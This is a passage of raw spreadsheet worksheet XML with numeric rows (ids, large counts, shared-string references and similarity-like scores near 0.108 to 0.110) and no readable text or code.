    <row r="12924" ht="15.75" customHeight="1">
      <c r="A12924" s="1">
        <v>32701.0</v>
      </c>
      <c r="B12924" s="2">
        <v>5953884.0</v>
      </c>
      <c r="C12924" s="2" t="s">
        <v>12430</v>
      </c>
      <c r="D12924" s="2">
        <v>1.0</v>
      </c>
      <c r="E12924" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12924" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12925" ht="15.75" customHeight="1">
      <c r="A12925" s="1">
        <v>32988.0</v>
      </c>
      <c r="B12925" s="2">
        <v>6603805.0</v>
      </c>
      <c r="C12925" s="2" t="s">
        <v>12431</v>
      </c>
      <c r="D12925" s="2">
        <v>1.0</v>
      </c>
      <c r="E12925" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12925" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12926" ht="15.75" customHeight="1">
      <c r="A12926" s="1">
        <v>33017.0</v>
      </c>
      <c r="B12926" s="2">
        <v>6655728.0</v>
      </c>
      <c r="C12926" s="2" t="s">
        <v>12432</v>
      </c>
      <c r="D12926" s="2">
        <v>1.0</v>
      </c>
      <c r="E12926" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12926" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12927" ht="15.75" customHeight="1">
      <c r="A12927" s="1">
        <v>33369.0</v>
      </c>
      <c r="B12927" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C12927" s="2" t="s">
        <v>12433</v>
      </c>
      <c r="D12927" s="2">
        <v>1.0</v>
      </c>
      <c r="E12927" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12927" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="12928" ht="15.75" customHeight="1">
      <c r="A12928" s="1">
        <v>6368.0</v>
      </c>
      <c r="B12928" s="2">
        <v>4.8376597E7</v>
      </c>
      <c r="C12928" s="2" t="s">
        <v>12434</v>
      </c>
      <c r="D12928" s="2">
        <v>1.0</v>
      </c>
      <c r="E12928" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12928" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="12929" ht="15.75" customHeight="1">
      <c r="A12929" s="1">
        <v>7823.0</v>
      </c>
      <c r="B12929" s="2">
        <v>5.2308494E7</v>
      </c>
      <c r="C12929" s="2" t="s">
        <v>12435</v>
      </c>
      <c r="D12929" s="2">
        <v>1.0</v>
      </c>
      <c r="E12929" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12929" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="12930" ht="15.75" customHeight="1">
      <c r="A12930" s="1">
        <v>10171.0</v>
      </c>
      <c r="B12930" s="2">
        <v>5.7369953E7</v>
      </c>
      <c r="C12930" s="2" t="s">
        <v>12436</v>
      </c>
      <c r="D12930" s="2">
        <v>1.0</v>
      </c>
      <c r="E12930" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12930" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="12931" ht="15.75" customHeight="1">
      <c r="A12931" s="1">
        <v>17061.0</v>
      </c>
      <c r="B12931" s="2">
        <v>4.8565121E7</v>
      </c>
      <c r="C12931" s="2" t="s">
        <v>12437</v>
      </c>
      <c r="D12931" s="2">
        <v>1.0</v>
      </c>
      <c r="E12931" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12931" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="12932" ht="15.75" customHeight="1">
      <c r="A12932" s="1">
        <v>19724.0</v>
      </c>
      <c r="B12932" s="2">
        <v>5.6612684E7</v>
      </c>
      <c r="C12932" s="2" t="s">
        <v>12438</v>
      </c>
      <c r="D12932" s="2">
        <v>1.0</v>
      </c>
      <c r="E12932" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12932" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="12933" ht="15.75" customHeight="1">
      <c r="A12933" s="1">
        <v>30429.0</v>
      </c>
      <c r="B12933" s="2">
        <v>3.9027866E7</v>
      </c>
      <c r="C12933" s="2" t="s">
        <v>12439</v>
      </c>
      <c r="D12933" s="2">
        <v>1.0</v>
      </c>
      <c r="E12933" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12933" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="12934" ht="15.75" customHeight="1">
      <c r="A12934" s="1">
        <v>7503.0</v>
      </c>
      <c r="B12934" s="2">
        <v>5.1382338E7</v>
      </c>
      <c r="C12934" s="2" t="s">
        <v>12440</v>
      </c>
      <c r="D12934" s="2">
        <v>1.0</v>
      </c>
      <c r="E12934" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12934" s="2">
        <v>0.110082304526749</v>
      </c>
    </row>
    <row r="12935" ht="15.75" customHeight="1">
      <c r="A12935" s="1">
        <v>2243.0</v>
      </c>
      <c r="B12935" s="2">
        <v>3.2316643E7</v>
      </c>
      <c r="C12935" s="2" t="s">
        <v>12441</v>
      </c>
      <c r="D12935" s="2">
        <v>1.0</v>
      </c>
      <c r="E12935" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12935" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="12936" ht="15.75" customHeight="1">
      <c r="A12936" s="1">
        <v>7606.0</v>
      </c>
      <c r="B12936" s="2">
        <v>5.1652734E7</v>
      </c>
      <c r="C12936" s="2" t="s">
        <v>12442</v>
      </c>
      <c r="D12936" s="2">
        <v>1.0</v>
      </c>
      <c r="E12936" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12936" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="12937" ht="15.75" customHeight="1">
      <c r="A12937" s="1">
        <v>8637.0</v>
      </c>
      <c r="B12937" s="2">
        <v>5.4328608E7</v>
      </c>
      <c r="C12937" s="2" t="s">
        <v>12443</v>
      </c>
      <c r="D12937" s="2">
        <v>1.0</v>
      </c>
      <c r="E12937" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12937" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="12938" ht="15.75" customHeight="1">
      <c r="A12938" s="1">
        <v>15747.0</v>
      </c>
      <c r="B12938" s="2">
        <v>4.4118834E7</v>
      </c>
      <c r="C12938" s="2" t="s">
        <v>12444</v>
      </c>
      <c r="D12938" s="2">
        <v>1.0</v>
      </c>
      <c r="E12938" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12938" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="12939" ht="15.75" customHeight="1">
      <c r="A12939" s="1">
        <v>26963.0</v>
      </c>
      <c r="B12939" s="2">
        <v>1.9640834E7</v>
      </c>
      <c r="C12939" s="2" t="s">
        <v>12445</v>
      </c>
      <c r="D12939" s="2">
        <v>1.0</v>
      </c>
      <c r="E12939" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12939" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="12940" ht="15.75" customHeight="1">
      <c r="A12940" s="1">
        <v>7455.0</v>
      </c>
      <c r="B12940" s="2">
        <v>5.1235362E7</v>
      </c>
      <c r="C12940" s="2" t="s">
        <v>12446</v>
      </c>
      <c r="D12940" s="2">
        <v>1.0</v>
      </c>
      <c r="E12940" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12940" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="12941" ht="15.75" customHeight="1">
      <c r="A12941" s="1">
        <v>7907.0</v>
      </c>
      <c r="B12941" s="2">
        <v>5.2484636E7</v>
      </c>
      <c r="C12941" s="2" t="s">
        <v>12447</v>
      </c>
      <c r="D12941" s="2">
        <v>1.0</v>
      </c>
      <c r="E12941" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12941" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="12942" ht="15.75" customHeight="1">
      <c r="A12942" s="1">
        <v>14676.0</v>
      </c>
      <c r="B12942" s="2">
        <v>4.0461586E7</v>
      </c>
      <c r="C12942" s="2" t="s">
        <v>12448</v>
      </c>
      <c r="D12942" s="2">
        <v>1.0</v>
      </c>
      <c r="E12942" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12942" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="12943" ht="15.75" customHeight="1">
      <c r="A12943" s="1">
        <v>15482.0</v>
      </c>
      <c r="B12943" s="2">
        <v>4.3179936E7</v>
      </c>
      <c r="C12943" s="2" t="s">
        <v>12449</v>
      </c>
      <c r="D12943" s="2">
        <v>1.0</v>
      </c>
      <c r="E12943" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12943" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="12944" ht="15.75" customHeight="1">
      <c r="A12944" s="1">
        <v>17315.0</v>
      </c>
      <c r="B12944" s="2">
        <v>4.9329172E7</v>
      </c>
      <c r="C12944" s="2" t="s">
        <v>12450</v>
      </c>
      <c r="D12944" s="2">
        <v>1.0</v>
      </c>
      <c r="E12944" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12944" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="12945" ht="15.75" customHeight="1">
      <c r="A12945" s="1">
        <v>17589.0</v>
      </c>
      <c r="B12945" s="2">
        <v>5.0289739E7</v>
      </c>
      <c r="C12945" s="2" t="s">
        <v>12451</v>
      </c>
      <c r="D12945" s="2">
        <v>1.0</v>
      </c>
      <c r="E12945" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12945" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="12946" ht="15.75" customHeight="1">
      <c r="A12946" s="1">
        <v>20740.0</v>
      </c>
      <c r="B12946" s="2">
        <v>1.4769432E7</v>
      </c>
      <c r="C12946" s="2" t="s">
        <v>12452</v>
      </c>
      <c r="D12946" s="2">
        <v>1.0</v>
      </c>
      <c r="E12946" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12946" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="12947" ht="15.75" customHeight="1">
      <c r="A12947" s="1">
        <v>6197.0</v>
      </c>
      <c r="B12947" s="2">
        <v>4.7959452E7</v>
      </c>
      <c r="C12947" s="2" t="s">
        <v>12453</v>
      </c>
      <c r="D12947" s="2">
        <v>1.0</v>
      </c>
      <c r="E12947" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12947" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="12948" ht="15.75" customHeight="1">
      <c r="A12948" s="1">
        <v>6558.0</v>
      </c>
      <c r="B12948" s="2">
        <v>4.8878972E7</v>
      </c>
      <c r="C12948" s="2" t="s">
        <v>12454</v>
      </c>
      <c r="D12948" s="2">
        <v>1.0</v>
      </c>
      <c r="E12948" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12948" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="12949" ht="15.75" customHeight="1">
      <c r="A12949" s="1">
        <v>14637.0</v>
      </c>
      <c r="B12949" s="2">
        <v>4.0330013E7</v>
      </c>
      <c r="C12949" s="2" t="s">
        <v>12455</v>
      </c>
      <c r="D12949" s="2">
        <v>1.0</v>
      </c>
      <c r="E12949" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12949" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="12950" ht="15.75" customHeight="1">
      <c r="A12950" s="1">
        <v>18108.0</v>
      </c>
      <c r="B12950" s="2">
        <v>5.1738323E7</v>
      </c>
      <c r="C12950" s="2" t="s">
        <v>12456</v>
      </c>
      <c r="D12950" s="2">
        <v>1.0</v>
      </c>
      <c r="E12950" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12950" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="12951" ht="15.75" customHeight="1">
      <c r="A12951" s="1">
        <v>2737.0</v>
      </c>
      <c r="B12951" s="2">
        <v>3.5002762E7</v>
      </c>
      <c r="C12951" s="2" t="s">
        <v>12457</v>
      </c>
      <c r="D12951" s="2">
        <v>1.0</v>
      </c>
      <c r="E12951" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12951" s="2">
        <v>0.1085858585858586</v>
      </c>
    </row>
    <row r="12952" ht="15.75" customHeight="1">
      <c r="A12952" s="1">
        <v>6930.0</v>
      </c>
      <c r="B12952" s="2">
        <v>4.9878604E7</v>
      </c>
      <c r="C12952" s="2" t="s">
        <v>12458</v>
      </c>
      <c r="D12952" s="2">
        <v>1.0</v>
      </c>
      <c r="E12952" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12952" s="2">
        <v>0.1085858585858586</v>
      </c>
    </row>
    <row r="12953" ht="15.75" customHeight="1">
      <c r="A12953" s="1">
        <v>31709.0</v>
      </c>
      <c r="B12953" s="2">
        <v>5.2013791E7</v>
      </c>
      <c r="C12953" s="2" t="s">
        <v>12459</v>
      </c>
      <c r="D12953" s="2">
        <v>1.0</v>
      </c>
      <c r="E12953" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12953" s="2">
        <v>0.1085470085470086</v>
      </c>
    </row>
    <row r="12954" ht="15.75" customHeight="1">
      <c r="A12954" s="1">
        <v>24719.0</v>
      </c>
      <c r="B12954" s="2">
        <v>1.169982E7</v>
      </c>
      <c r="C12954" s="2" t="s">
        <v>12460</v>
      </c>
      <c r="D12954" s="2">
        <v>1.0</v>
      </c>
      <c r="E12954" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12954" s="2">
        <v>0.1085470085470085</v>
      </c>
    </row>
    <row r="12955" ht="15.75" customHeight="1">
      <c r="A12955" s="1">
        <v>17115.0</v>
      </c>
      <c r="B12955" s="2">
        <v>4.8758924E7</v>
      </c>
      <c r="C12955" s="2" t="s">
        <v>12461</v>
      </c>
      <c r="D12955" s="2">
        <v>1.0</v>
      </c>
      <c r="E12955" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12955" s="2">
        <v>0.1085069444444444</v>
      </c>
    </row>
    <row r="12956" ht="15.75" customHeight="1">
      <c r="A12956" s="1">
        <v>16840.0</v>
      </c>
      <c r="B12956" s="2">
        <v>4.7900919E7</v>
      </c>
      <c r="C12956" s="2" t="s">
        <v>12462</v>
      </c>
      <c r="D12956" s="2">
        <v>1.0</v>
      </c>
      <c r="E12956" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12956" s="2">
        <v>0.1084229390681004</v>
      </c>
    </row>
    <row r="12957" ht="15.75" customHeight="1">
      <c r="A12957" s="1">
        <v>25836.0</v>
      </c>
      <c r="B12957" s="2">
        <v>1.4784831E7</v>
      </c>
      <c r="C12957" s="2" t="s">
        <v>12463</v>
      </c>
      <c r="D12957" s="2">
        <v>1.0</v>
      </c>
      <c r="E12957" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12957" s="2">
        <v>0.1084229390681004</v>
      </c>
    </row>
    <row r="12958" ht="15.75" customHeight="1">
      <c r="A12958" s="1">
        <v>8804.0</v>
      </c>
      <c r="B12958" s="2">
        <v>5.4612686E7</v>
      </c>
      <c r="C12958" s="2" t="s">
        <v>12464</v>
      </c>
      <c r="D12958" s="2">
        <v>1.0</v>
      </c>
      <c r="E12958" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12958" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="12959" ht="15.75" customHeight="1">
      <c r="A12959" s="1">
        <v>16193.0</v>
      </c>
      <c r="B12959" s="2">
        <v>4.56606E7</v>
      </c>
      <c r="C12959" s="2" t="s">
        <v>12465</v>
      </c>
      <c r="D12959" s="2">
        <v>1.0</v>
      </c>
      <c r="E12959" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12959" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="12960" ht="15.75" customHeight="1">
      <c r="A12960" s="1">
        <v>19406.0</v>
      </c>
      <c r="B12960" s="2">
        <v>5.5591865E7</v>
      </c>
      <c r="C12960" s="2" t="s">
        <v>12466</v>
      </c>
      <c r="D12960" s="2">
        <v>1.0</v>
      </c>
      <c r="E12960" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12960" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="12961" ht="15.75" customHeight="1">
      <c r="A12961" s="1">
        <v>26878.0</v>
      </c>
      <c r="B12961" s="2">
        <v>1.9159214E7</v>
      </c>
      <c r="C12961" s="2" t="s">
        <v>12467</v>
      </c>
      <c r="D12961" s="2">
        <v>1.0</v>
      </c>
      <c r="E12961" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12961" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="12962" ht="15.75" customHeight="1">
      <c r="A12962" s="1">
        <v>8055.0</v>
      </c>
      <c r="B12962" s="2">
        <v>5.289876E7</v>
      </c>
      <c r="C12962" s="2" t="s">
        <v>12468</v>
      </c>
      <c r="D12962" s="2">
        <v>1.0</v>
      </c>
      <c r="E12962" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12962" s="2">
        <v>0.1082862523540489</v>
      </c>
    </row>
    <row r="12963" ht="15.75" customHeight="1">
      <c r="A12963" s="1">
        <v>19797.0</v>
      </c>
      <c r="B12963" s="2">
        <v>5.6839518E7</v>
      </c>
      <c r="C12963" s="2" t="s">
        <v>12469</v>
      </c>
      <c r="D12963" s="2">
        <v>1.0</v>
      </c>
      <c r="E12963" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12963" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="12964" ht="15.75" customHeight="1">
      <c r="A12964" s="1">
        <v>20507.0</v>
      </c>
      <c r="B12964" s="2">
        <v>1.2972287E7</v>
      </c>
      <c r="C12964" s="2" t="s">
        <v>12470</v>
      </c>
      <c r="D12964" s="2">
        <v>1.0</v>
      </c>
      <c r="E12964" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12964" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="12965" ht="15.75" customHeight="1">
      <c r="A12965" s="1">
        <v>32903.0</v>
      </c>
      <c r="B12965" s="2">
        <v>6396035.0</v>
      </c>
      <c r="C12965" s="2" t="s">
        <v>12471</v>
      </c>
      <c r="D12965" s="2">
        <v>1.0</v>
      </c>
      <c r="E12965" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12965" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="12966" ht="15.75" customHeight="1">
      <c r="A12966" s="1">
        <v>33227.0</v>
      </c>
      <c r="B12966" s="2">
        <v>7270758.0</v>
      </c>
      <c r="C12966" s="2" t="s">
        <v>12472</v>
      </c>
      <c r="D12966" s="2">
        <v>1.0</v>
      </c>
      <c r="E12966" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12966" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="12967" ht="15.75" customHeight="1">
      <c r="A12967" s="1">
        <v>536.0</v>
      </c>
      <c r="B12967" s="2">
        <v>1.8563427E7</v>
      </c>
      <c r="C12967" s="2" t="s">
        <v>12473</v>
      </c>
      <c r="D12967" s="2">
        <v>1.0</v>
      </c>
      <c r="E12967" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12967" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12968" ht="15.75" customHeight="1">
      <c r="A12968" s="1">
        <v>959.0</v>
      </c>
      <c r="B12968" s="2">
        <v>2.2659187E7</v>
      </c>
      <c r="C12968" s="2" t="s">
        <v>12474</v>
      </c>
      <c r="D12968" s="2">
        <v>1.0</v>
      </c>
      <c r="E12968" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12968" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12969" ht="15.75" customHeight="1">
      <c r="A12969" s="1">
        <v>4027.0</v>
      </c>
      <c r="B12969" s="2">
        <v>4.0996953E7</v>
      </c>
      <c r="C12969" s="2" t="s">
        <v>12475</v>
      </c>
      <c r="D12969" s="2">
        <v>1.0</v>
      </c>
      <c r="E12969" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12969" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12970" ht="15.75" customHeight="1">
      <c r="A12970" s="1">
        <v>4717.0</v>
      </c>
      <c r="B12970" s="2">
        <v>4.3298326E7</v>
      </c>
      <c r="C12970" s="2" t="s">
        <v>12476</v>
      </c>
      <c r="D12970" s="2">
        <v>1.0</v>
      </c>
      <c r="E12970" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12970" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12971" ht="15.75" customHeight="1">
      <c r="A12971" s="1">
        <v>5656.0</v>
      </c>
      <c r="B12971" s="2">
        <v>4.6287413E7</v>
      </c>
      <c r="C12971" s="2" t="s">
        <v>12477</v>
      </c>
      <c r="D12971" s="2">
        <v>1.0</v>
      </c>
      <c r="E12971" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12971" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12972" ht="15.75" customHeight="1">
      <c r="A12972" s="1">
        <v>5928.0</v>
      </c>
      <c r="B12972" s="2">
        <v>4.7236398E7</v>
      </c>
      <c r="C12972" s="2" t="s">
        <v>12478</v>
      </c>
      <c r="D12972" s="2">
        <v>1.0</v>
      </c>
      <c r="E12972" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12972" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12973" ht="15.75" customHeight="1">
      <c r="A12973" s="1">
        <v>6219.0</v>
      </c>
      <c r="B12973" s="2">
        <v>4.8021755E7</v>
      </c>
      <c r="C12973" s="2" t="s">
        <v>12479</v>
      </c>
      <c r="D12973" s="2">
        <v>1.0</v>
      </c>
      <c r="E12973" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12973" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12974" ht="15.75" customHeight="1">
      <c r="A12974" s="1">
        <v>6450.0</v>
      </c>
      <c r="B12974" s="2">
        <v>4.8589915E7</v>
      </c>
      <c r="C12974" s="2" t="s">
        <v>12480</v>
      </c>
      <c r="D12974" s="2">
        <v>1.0</v>
      </c>
      <c r="E12974" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12974" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12975" ht="15.75" customHeight="1">
      <c r="A12975" s="1">
        <v>7236.0</v>
      </c>
      <c r="B12975" s="2">
        <v>5.0679234E7</v>
      </c>
      <c r="C12975" s="2" t="s">
        <v>12481</v>
      </c>
      <c r="D12975" s="2">
        <v>1.0</v>
      </c>
      <c r="E12975" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12975" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12976" ht="15.75" customHeight="1">
      <c r="A12976" s="1">
        <v>7238.0</v>
      </c>
      <c r="B12976" s="2">
        <v>5.0679234E7</v>
      </c>
      <c r="C12976" s="2" t="s">
        <v>12482</v>
      </c>
      <c r="D12976" s="2">
        <v>1.0</v>
      </c>
      <c r="E12976" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12976" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12977" ht="15.75" customHeight="1">
      <c r="A12977" s="1">
        <v>7906.0</v>
      </c>
      <c r="B12977" s="2">
        <v>5.2484636E7</v>
      </c>
      <c r="C12977" s="2" t="s">
        <v>12483</v>
      </c>
      <c r="D12977" s="2">
        <v>1.0</v>
      </c>
      <c r="E12977" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12977" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12978" ht="15.75" customHeight="1">
      <c r="A12978" s="1">
        <v>8042.0</v>
      </c>
      <c r="B12978" s="2">
        <v>5.2842954E7</v>
      </c>
      <c r="C12978" s="2" t="s">
        <v>12484</v>
      </c>
      <c r="D12978" s="2">
        <v>1.0</v>
      </c>
      <c r="E12978" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12978" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12979" ht="15.75" customHeight="1">
      <c r="A12979" s="1">
        <v>8808.0</v>
      </c>
      <c r="B12979" s="2">
        <v>5.462014E7</v>
      </c>
      <c r="C12979" s="2" t="s">
        <v>12485</v>
      </c>
      <c r="D12979" s="2">
        <v>1.0</v>
      </c>
      <c r="E12979" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12979" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12980" ht="15.75" customHeight="1">
      <c r="A12980" s="1">
        <v>9423.0</v>
      </c>
      <c r="B12980" s="2">
        <v>5.5795084E7</v>
      </c>
      <c r="C12980" s="2" t="s">
        <v>12486</v>
      </c>
      <c r="D12980" s="2">
        <v>1.0</v>
      </c>
      <c r="E12980" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12980" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12981" ht="15.75" customHeight="1">
      <c r="A12981" s="1">
        <v>9612.0</v>
      </c>
      <c r="B12981" s="2">
        <v>5.6172746E7</v>
      </c>
      <c r="C12981" s="2" t="s">
        <v>12487</v>
      </c>
      <c r="D12981" s="2">
        <v>1.0</v>
      </c>
      <c r="E12981" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12981" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12982" ht="15.75" customHeight="1">
      <c r="A12982" s="1">
        <v>10205.0</v>
      </c>
      <c r="B12982" s="2">
        <v>5.7412289E7</v>
      </c>
      <c r="C12982" s="2" t="s">
        <v>12488</v>
      </c>
      <c r="D12982" s="2">
        <v>1.0</v>
      </c>
      <c r="E12982" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12982" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12983" ht="15.75" customHeight="1">
      <c r="A12983" s="1">
        <v>10955.0</v>
      </c>
      <c r="B12983" s="2">
        <v>1.7147487E7</v>
      </c>
      <c r="C12983" s="2" t="s">
        <v>12489</v>
      </c>
      <c r="D12983" s="2">
        <v>1.0</v>
      </c>
      <c r="E12983" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12983" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12984" ht="15.75" customHeight="1">
      <c r="A12984" s="1">
        <v>10993.0</v>
      </c>
      <c r="B12984" s="2">
        <v>1.7425642E7</v>
      </c>
      <c r="C12984" s="2" t="s">
        <v>12490</v>
      </c>
      <c r="D12984" s="2">
        <v>1.0</v>
      </c>
      <c r="E12984" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12984" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12985" ht="15.75" customHeight="1">
      <c r="A12985" s="1">
        <v>11985.0</v>
      </c>
      <c r="B12985" s="2">
        <v>2.5846449E7</v>
      </c>
      <c r="C12985" s="2" t="s">
        <v>12491</v>
      </c>
      <c r="D12985" s="2">
        <v>1.0</v>
      </c>
      <c r="E12985" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12985" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12986" ht="15.75" customHeight="1">
      <c r="A12986" s="1">
        <v>12307.0</v>
      </c>
      <c r="B12986" s="2">
        <v>2.8377496E7</v>
      </c>
      <c r="C12986" s="2" t="s">
        <v>12492</v>
      </c>
      <c r="D12986" s="2">
        <v>1.0</v>
      </c>
      <c r="E12986" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12986" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12987" ht="15.75" customHeight="1">
      <c r="A12987" s="1">
        <v>12599.0</v>
      </c>
      <c r="B12987" s="2">
        <v>3.0082394E7</v>
      </c>
      <c r="C12987" s="2" t="s">
        <v>12493</v>
      </c>
      <c r="D12987" s="2">
        <v>1.0</v>
      </c>
      <c r="E12987" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12987" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12988" ht="15.75" customHeight="1">
      <c r="A12988" s="1">
        <v>13611.0</v>
      </c>
      <c r="B12988" s="2">
        <v>3.5833405E7</v>
      </c>
      <c r="C12988" s="2" t="s">
        <v>12494</v>
      </c>
      <c r="D12988" s="2">
        <v>1.0</v>
      </c>
      <c r="E12988" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12988" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12989" ht="15.75" customHeight="1">
      <c r="A12989" s="1">
        <v>13614.0</v>
      </c>
      <c r="B12989" s="2">
        <v>3.5853356E7</v>
      </c>
      <c r="C12989" s="2" t="s">
        <v>12495</v>
      </c>
      <c r="D12989" s="2">
        <v>1.0</v>
      </c>
      <c r="E12989" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12989" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12990" ht="15.75" customHeight="1">
      <c r="A12990" s="1">
        <v>13678.0</v>
      </c>
      <c r="B12990" s="2">
        <v>3.6052387E7</v>
      </c>
      <c r="C12990" s="2" t="s">
        <v>12496</v>
      </c>
      <c r="D12990" s="2">
        <v>1.0</v>
      </c>
      <c r="E12990" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12990" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12991" ht="15.75" customHeight="1">
      <c r="A12991" s="1">
